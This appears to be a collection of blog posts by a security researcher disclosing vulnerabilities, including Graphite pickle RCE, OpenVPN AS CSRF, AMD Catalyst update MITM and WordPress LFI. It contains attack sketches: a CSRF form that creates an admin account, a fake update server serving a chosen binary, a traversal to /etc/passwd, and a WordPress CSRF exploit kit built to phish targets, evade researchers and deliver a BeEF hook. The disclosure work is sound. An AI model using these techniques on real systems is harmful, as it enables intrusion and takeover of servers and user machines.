Graphite remote code execution vulnerability advisory

Introduction
In graphite-web versions 0.9.5 through 0.9.10, a vulnerability exists as a result of the product’s unsafe use of the “pickle” module.

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2013-5093 to this issue. This is an entry on the CVE list (http://cve.mitre.org), which standardizes names for security problems.

Timeline
2013-08-06 – Vendor contacted
2013-08-06 – Vendor confirms issue
2013-08-07 – Sent CVE request, CVE-2013-5093 is assigned
2013-08-20 – Graphite 0.9.11 released
2013-08-20 – Advisory released

Analysis
In graphite-web 0.9.5, a “clustering” feature was introduced to allow a Graphite setup to scale. This was achieved by passing pickles between servers; the change was introduced in this commit.

The function “renderLocalView”, seen below, takes a request containing a chart type and a pickle:

However, because no explicit safety measures limit the types of objects that can be unpickled, arbitrary code can be executed, as documented by Nelson Elhage.
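The underlying problem is generic to pickle: any object can specify, via __reduce__, a callable to invoke during deserialization. A minimal, benign Python sketch of the technique (not the actual Metasploit payload):

```python
import pickle

class Payload:
    """Any object whose __reduce__ returns (callable, args) has that
    callable invoked during unpickling; a real attack would use
    something like os.system instead of print."""
    def __reduce__(self):
        return (print, ("code executed during unpickling",))

malicious = pickle.dumps(Payload())

# A server that unpickles attacker-supplied data, as the clustering
# feature did, runs the callable embedded above:
pickle.loads(malicious)
```

The usual mitigation is to restrict which classes may be unpickled, for example by overriding Unpickler.find_class with a whitelist.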

Proof of concept
The proof of concept can be found as a part of the Metasploit Framework graphite_pickle_exec module.

Squash remote code execution vulnerability advisory

Introduction

A security flaw in Square’s open source project “Squash” was silently fixed by the developers on June 24th. I had stumbled upon it at the time but did not disclose it; since I couldn’t find an advisory for it, here it is. A Metasploit module can be found below.

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2013-5036 to this issue. This is an entry on the CVE list (http://cve.mitre.org), which standardizes names for security problems.

Analysis

The Squash API is intended for clients to submit details about exceptions and bugs, and as part of that, a YAML dump can be submitted. However, before the patch, one could submit YAML to the deobfuscation and sourcemap functions in app/controllers/api/v1_controller.rb without supplying an API key.

Note that the YAML load does not use the safe loader, which means we can exploit it by sending a malicious YAML payload.
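A sketch of how such a request could be constructed (the endpoint path and parameter name are my assumptions for illustration, not taken from the Squash source, and the YAML body is a harmless placeholder):

```python
from urllib.request import Request

# Hypothetical Squash API endpoint (path is illustrative).
TARGET = "http://squash.example.com/api/1.0/deobfuscation"

# Loaded server-side with Ruby's YAML.load rather than a safe loader;
# a real payload would name Ruby classes whose instantiation has side
# effects. This document is a harmless placeholder.
yaml_doc = "--- !ruby/object:SomeClass {}\n"

# Note: no API key is supplied -- pre-patch, none was required.
req = Request(
    TARGET,
    data=("payload=" + yaml_doc).encode(),
    headers={"Content-Type": "application/x-www-form-urlencoded"},
)
# urlopen(req) would submit it; not executed here.
```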

Proof of concept

Metasploit module

BSides Rhode Island presentation and slides

This weekend I went to BSides Rhode Island to give a presentation about the research I’ve been doing on WordPress plugins. The video can be found here, thanks to Irongeek.

I promised at BSides to release my slides and some of my code. So without further ado, here’s the presentation file: Large-scale application security

And here is the code:

Thanks to the team behind BSides RI for giving me the chance to present the technique and research I used to find these vulnerabilities. I’d encourage anybody not only to go to a BSides near you, but also to have a go at finding vulnerabilities in WordPress plugins. It’s a ton of fun!

CVE-2012-6399 – Or how your Cisco WebEx meetings aren’t very confidential on iOS

Advisory

Secunia SA 51412

Information

By default, when creating a connection using iOS you will get a nice helpful warning if you stumble upon a certificate chain that can’t be verified:

iOS Certificate Warning

Source: http://www.dhanjani.com
Contains other great information about the subject as well.

However, some applications override this functionality. In this case, an unfixed vulnerability submitted through the Secunia SVCRP reached the six-month limit of Secunia’s disclosure policy. The flaw means that a MITM can replace the certificate on the connection and decrypt the traffic without the user knowing, leading to a loss of confidentiality.

It’s also interesting to note that when you authenticate with the WebEx service, as the Burp screenshot below shows, your credentials are submitted not to one but to two WebEx servers: one in the USA, and one in Beijing, China. You’ve got to wonder what the purpose of that is, though I won’t speculate:

WebEx submitting your credentials to China

Credit card numbers, third parties and you

Part of the preparation for my upcoming talk at BSides RI involved shuffling some cash from my bank account to make it available on my credit card. In the process, something struck me as rather odd, as seen in the following Burp output:

Request containing credit card number

As we can see, the URL query string contains a parameter named “KortNo”, which happens to contain my credit card number. So the question becomes: is this a big deal? Looking at it from a PCI perspective, I think there may be some cause for concern.

Access logs, browser history

It’s of course common practice for companies to keep access logs for all HTTP servers, for forensic purposes in the event of a system breach. PCI mandates that companies retain at least one year’s worth of logs, so as a bank you are almost certainly keeping your HTTP logs, including the URLs requested. In this instance, we make a request containing data whose storage PCI takes a strong view upon: it explicitly requires encrypting the PAN (primary account number), the CVV2, the expiration date, and any other personally identifiable information if you store the former three.

So what happens when you make an HTTP GET request containing data that PCI mandates be encrypted, and it goes into a standard IIS log? You are storing data in violation of PCI compliance. An attacker only needs to get hold of the server’s access logs to access a lot of credit card data. This is rather unfortunate.

Even more likely, your personal browser history will now contain your credit card number and hang on to it. Exploiting that requires some social engineering to be relevant, but if users are not made aware of it, it is still a cause for concern.

Third parties

Of course, when you run a web site, you like to track user behavior on it. Who doesn’t? Banks do, and in this case the above concerns are amplified: I noticed this request being made by my browser at the same time:

Request to google analytics

What you see here is a standard Google Analytics callback. Our query string, containing data whose storage PCI strictly regulates, is sent off to a third party, in this case Google. We may trust Google, but it also means that anybody with access to the Google Analytics account can now view this credit card data. The bank would therefore have to have an explicit contract with Google verifying that Google will safeguard this PCI data.

Is that likely? Not really. This is just an unfortunate side effect of the bad practice of using the raw PAN (credit card number) as part of a request query string.

Putting it into perspective

When I discovered this, I rushed over to my other bank account (with a different bank) to check whether a similar problem existed there. I observed that they had made the seemingly deliberate design decision not to use the credit card number; instead, they used a hash and a GUID to identify my card. While they also used a third-party analytics service, their requests did not contain personal information to the same extent, which mitigates the concern.
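The hash-plus-GUID approach can be sketched in Python (the function name and salting scheme are illustrative, not the bank’s actual implementation):

```python
import hashlib
import uuid

def card_reference(pan: str, secret_salt: bytes) -> dict:
    """Build opaque identifiers for a card so the raw PAN never
    appears in URLs, access logs, or analytics callbacks."""
    # Salting matters: an unsalted hash of a 16-digit PAN is
    # brute-forceable given the limited keyspace.
    digest = hashlib.sha256(secret_salt + pan.encode()).hexdigest()
    return {
        "card_hash": digest,                 # stable, non-reversible reference
        "session_token": str(uuid.uuid4()),  # per-session opaque handle
    }

ref = card_reference("4111111111111111", b"server-side-secret")
# The URL can then carry e.g. ?card=<card_hash> instead of ?KortNo=<PAN>.
```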

Timeline

  • 13/05/2013 – Advisory sent to CERT
  • 13/05/2013 – CERT confirms receipt of advisory, promises to provide contact at vendor
  • 14/05/2013 – CERT still searching for appropriate vendor point of contact
  • 15/05/2013 – CERT provides point of contact
  • 15/05/2013 – Advisory sent to vendor
  • 15/05/2013 – Vendor response confirming issue
  • 15/05/2013 – Vendor deploys fix
  • 16/05/2013 – Advisory published

It should be noted that the bank in question was quick to respond and fixed the privacy concern in a professional manner. I’ve redacted the bank’s name, as the goal here is to highlight a potential pitfall that others may fall into; hopefully this will encourage other banks to ensure the same concern does not exist in their systems.

CVE-2013-2692 – Or when your OpenVPN is a bit too open

Advisories

OpenVPN

Secunia

Details

When analyzing the OpenVPN Access Server, it quickly became apparent that the administration interface lacked any basic CSRF protection. This is easily demonstrated with a CSRF form like the following, which adds a new user with admin privileges, using the username “csrfaccount” and password “qweasd”:
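The general shape of such a self-submitting form can be sketched in Python (the admin endpoint and field names below are placeholders; the real OpenVPN AS parameters differ):

```python
def csrf_page(action_url: str, fields: dict) -> str:
    """Build an HTML page that POSTs the given fields to action_url
    as soon as the victim's browser loads it."""
    inputs = "".join(
        f'<input type="hidden" name="{k}" value="{v}">'
        for k, v in fields.items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">'
        f'<form action="{action_url}" method="POST">{inputs}</form>'
        "</body></html>"
    )

# Hypothetical admin URL and parameter names, for illustration only.
page = csrf_page(
    "https://vpn.example.com:943/admin/users",
    {"username": "csrfaccount", "password": "qweasd", "superuser": "true"},
)
```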

For this to be effective, we need to ensure that the server is configured to use “Local” authentication, meaning OpenVPN controls the authentication rather than delegating to PAM/RADIUS/LDAP. We can do this with these two simple requests:

When we have changed the authentication method, we need to commit the change:

If we perform a CSRF attack against a target using these three requests (which can be done with the method described in my post about multi-stage CSRF attacks), we can then authenticate to the OpenVPN AS admin interface using the credentials csrfaccount/qweasd. This further allows us to take over the server.

Conditional CSRF – Or how to spray without praying

Part of the goal of my latest project, WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins, was to show some novel techniques I’ve picked up for exploiting web applications and delivering payloads in neat ways. One specific goal was to deliver an array of different potential payloads depending on specific conditions, rather than spraying and praying. The most obvious condition is whether or not the target has a specific plugin installed. My approach ended up being a somewhat obscure but neat one that others have documented before: the onload/onerror attributes on HTML elements that pull in outside resources. Let’s deconstruct a landing page as you’d see it in the above project:

What we can observe here is a bunch of image/script tags, each pointing to a file that may exist on the remote system and belongs to a specific WordPress plugin. If the plugin is not installed on the host, nothing happens. We’re not loading the resources for display, as I’m sure you guessed; rather, we’re hoping the onload attribute gets invoked, which contains some convenient JavaScript of ours.
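Generating that probe markup is straightforward; a minimal sketch (the plugin path and exploit URL are placeholders):

```python
# Maps a plugin to a static file it is known to ship (path illustrative).
PROBES = {
    "some-plugin": "wp-content/plugins/some-plugin/js/script.js",
}

def detection_markup(blog_url: str, exploit_urls: dict) -> str:
    """Emit script tags whose onload redirect only fires if the probed
    plugin file actually exists on the target blog."""
    tags = []
    for plugin, path in PROBES.items():
        redirect = exploit_urls[plugin]
        tags.append(
            f'<script src="{blog_url}/{path}" '
            f"onload=\"window.location='{redirect}'\"></script>"
        )
    return "\n".join(tags)

html = detection_markup(
    "http://victim.example.com", {"some-plugin": "/exploit/abc123"}
)
```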

If the vulnerable plugin is detected, we redirect to a page that contains our actual exploit payload. This means we don’t have to send every possible payload at once, and can retain some obscurity until we know we can hit something interesting. In other words, you can spray a target without having to pray that your exploits work, because they won’t trigger unless the target has the plugin you’re targeting.

This approach is not new; it has been used in the past for things like resolving host names, IPs and port ranges on an internal network through a hooked browser, to scan for other web applications to target. In this case, we use it to detect the presence of a vulnerable plugin on a (granted, pre-determined) target. By not having to poke at the running system up front, we achieve a lower turn-around time on delivering a payload that either hits the target or simply does nothing.

So there you have it. This is probably not a useful approach in every case where you exploit a CSRF vulnerability, but it’s still interesting, and hopefully it will inspire others to be sneakier (don’t spray and pray!) in their exploitation attempts and make full use of the wonderful things HTML and JavaScript offer!

WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins

Over the last few weeks I’ve been on a roll finding CSRF vulnerabilities in WordPress plugins. That’s all nice and good, but when you’ve got 30 of them, it’s a shame not to take it a step further and show their dangers! This project is designed to show off a few random thoughts of mine and, most importantly, to hopefully inspire others to think along these lines. It is meant solely for educational purposes, not for attacks against running services or people.

https://github.com/CharlieEriksen/WP-CSRF-POC

The project shows a few basic concepts in regards to the process of pulling off a CSRF attack against a large number of WordPress sites. Some things worth pointing out:

  • It’s not designed to simply spray and pray. You define the target URLs you want to hit, and you then have a unique URL for each blog that you can go phishing with.
  • It then uses the onload attribute of an img or script tag to detect the presence of the vulnerable plugin on the target blog when the pre-defined unique URL is requested.
  • We generate the payload on request, with a uniquely identifying URL, to ensure the exploits aren’t easy to extract.
  • You get a maximum of 2 requests to the script per IP; that is all a compromise needs. After that, you get nothing back, which makes researchers’ lives harder.
  • We deliver a BeEF hook, because BeEF is cool and god damn tasty.

I especially want to stress the “novel” use of the onload attribute of img/script tags. People have used it in the past to detect the presence of different host names or to “port scan” internal systems by vectoring through a hooked browser. That’s cool and all, but you can take it further and use it to detect the presence of a plugin on a target on demand, letting you be much more sneaky. When the markup detects a plugin present on the target, it redirects the browser to the exploit, and no further requests can be made by that IP to the script.

A normal series of events would be:

  1. An attacker sets up this script with pre-defined targets (the targets variable), with a unique URL for each target blog
  2. The attacker then spams out a link to the running script with the unique URL for each target blog
  3. When a target clicks the link to this script, we validate that the URL contains the unique identifier that resolves to a blog URL
  4. The script then generates, for each exploit we have, a random URL with the target blog URL embedded, which can then be requested
  5. We output to the user a series of img/script tags with onload attributes that redirect to the unique URLs generated in step 4. These tags look for specific plugins on the targeted blog
  6. If none of the plugins are detected on the blog, we redirect to Google
  7. If any of the plugins are detected, we redirect to the uniquely generated URL made in step 4
  8. The exploit is now written out to the user, submitting the CSRF with an XSS payload pointing to our BeEF instance
  9. We now delete all cached exploits made for the requesting IP
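The unique-URL generation and per-IP limiting from the steps above can be sketched as follows (in-memory state and illustrative names; the actual project differs in detail):

```python
import secrets
from collections import defaultdict

targets = {"a1b2c3": "http://blog.example.com"}  # unique id -> target blog
exploit_cache = {}                               # random token -> payload
hits = defaultdict(int)                          # requests seen per IP

def handle(ip: str, unique_id: str):
    """Return a freshly generated exploit token, or None if the IP is
    over its 2-request budget or the identifier is unknown."""
    hits[ip] += 1
    if hits[ip] > 2:          # probe page + exploit page, nothing more
        return None
    blog = targets.get(unique_id)
    if blog is None:
        return None
    token = secrets.token_hex(8)
    exploit_cache[token] = f"exploit targeting {blog}"
    return token
```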

There are a number of improvements that could be made to this. It could be designed to spray and pray through iframes, but that is much, much dirtier and not the goal of this proof of concept. I urge anybody who finds the concept useful to run with it if they so desire. I’ll be adding more exploits as advisories are published. Otherwise, I’m curious to hear people’s thoughts on this.

AMD Catalyst driver update vulnerability

Description of vulnerability

The AMD Catalyst driver auto update feature enables users to automatically update the AMD Catalyst driver on their machine through a single click when the driver determines that it is out of date.

However, a vulnerability exists in this mechanism because:

  1. The download URL is fetched and the binary is downloaded over plain HTTP
  2. The binary is not verified as having been signed by AMD before execution

This means that a MITM can intercept the requests to the AMD support site and redirect the auto-update feature to download and execute a binary of the attacker’s choice, without the user knowing any better when they decide to auto-update.

Proof of concept

By pointing amd.com, www.amd.com, www.ati.com and www2.ati.com at this script, you’ll observe that the Catalyst update feature will prompt you to update the driver, then download and execute calc.exe.
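The script itself isn’t reproduced here, but the shape of such a responder can be sketched with Python’s standard library (the payload file name is hypothetical, and the real update check’s response format is omitted):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class FakeUpdateServer(BaseHTTPRequestHandler):
    """Once DNS for the AMD/ATI hosts points here, answer every driver
    download request with an attacker-chosen binary; with no HTTPS and
    no signature check, the updater will run it."""
    def do_GET(self):
        with open("payload.exe", "rb") as f:  # hypothetical binary
            body = f.read()
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

# HTTPServer(("0.0.0.0", 80), FakeUpdateServer).serve_forever()
```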

Time table

23.11.2012 – Sent a request for security contact details
23.11.2012 – Vendor informs that they will only coordinate issues through their support ticket system
23.11.2012 – Sent details as per request including proof of concept
26.11.2012 – Vendor acknowledges receipt of details and request further contact details
29.11.2012 – Vendor confirms that the team is working with their web team to address the issue
10.12.2012 – Mail sent asking for a rough timeline
14.12.2012 – Vendor replies informing that the driver team is still working on the issue, and that their legal team is also involved
19.12.2012 – Vendor publishes advisory: http://support.amd.com/us/kbarticles/Pages/AMDauto-updatenotification.aspx
17.01.2013 – Vendor releases AMD Catalyst 13.1, removing the update feature

WordPress Online Store local file inclusion vulnerability

Advisory

Secunia Advisory SA50836

Analysis of vulnerability

The WP Online Store exposes a shortcode for displaying the store, which is declared in core.php:

If the “slug” request parameter isn’t defined, it will load the index page of the store; if it is defined, it will load the page the user requests. However, it does not validate that the “slug” refers to a WP Online Store file, which allows for a local file inclusion vulnerability: create a post/page containing the text “[WP_online_store]”, then submit a request with the slug set like this:
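A request exercising the flaw might be constructed like this (the page hosting the shortcode and the traversal depth are assumptions; exact behaviour depends on the install and PHP configuration):

```python
from urllib.parse import urlencode

# Hypothetical post/page containing the [WP_online_store] shortcode.
base = "http://victim.example.com/?page_id=2"

# Path traversal in the unsanitized "slug" parameter.
params = {"slug": "../../../../../etc/passwd"}
url = base + "&" + urlencode(params)
# Requesting `url` would cause the plugin to include the named file.
```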